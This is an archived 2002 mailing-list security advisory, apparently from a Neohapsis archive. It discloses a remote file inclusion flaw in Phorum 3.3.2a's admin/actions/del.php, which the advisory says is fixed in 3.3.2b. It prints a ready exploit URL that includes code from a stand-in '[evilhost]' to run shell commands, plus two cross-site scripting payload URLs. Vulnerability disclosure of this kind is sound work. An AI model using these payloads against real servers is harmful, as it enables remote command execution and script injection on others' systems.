OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Markus Arndt (markus-arndtweb.de)
Date: Sat May 18 2002 - 05:32:56 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Target:
    Phorum 3.3.2a (maybee older)

    Description:
    Phorum 3.3.2a let's remote users execute arbitary code

    Found by:
    Markus Arndt<markus-arndtweb.de>

    Vendor:
    http://www.phorum.org

    Notified Vendor:
    Yes, already fixed in 3.3.2b

    Details:

    Another bug for remote command execution.
    This time it's admin/actions/del.php
    :)

    Some code:
    <?php
        require "$include_path/delete_message.php";
        delete_messages($id);
        QueMessage("Message(s) $id and all children were deleted!<br>");
    ?>

    The url to exploit the script would be:
    http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls

    That url will make the script include http://[evilhost]/delete_message.php

    GoGoGo and secure your boxes. :)

    One other thing before i forget:
    CSS-Attacks are possible on 2 files..

    http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
    http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>

    Markus Arndt<markus-arndtweb.de>
    http://skka.de
    ________________________________________________________________
    Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr!
    Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13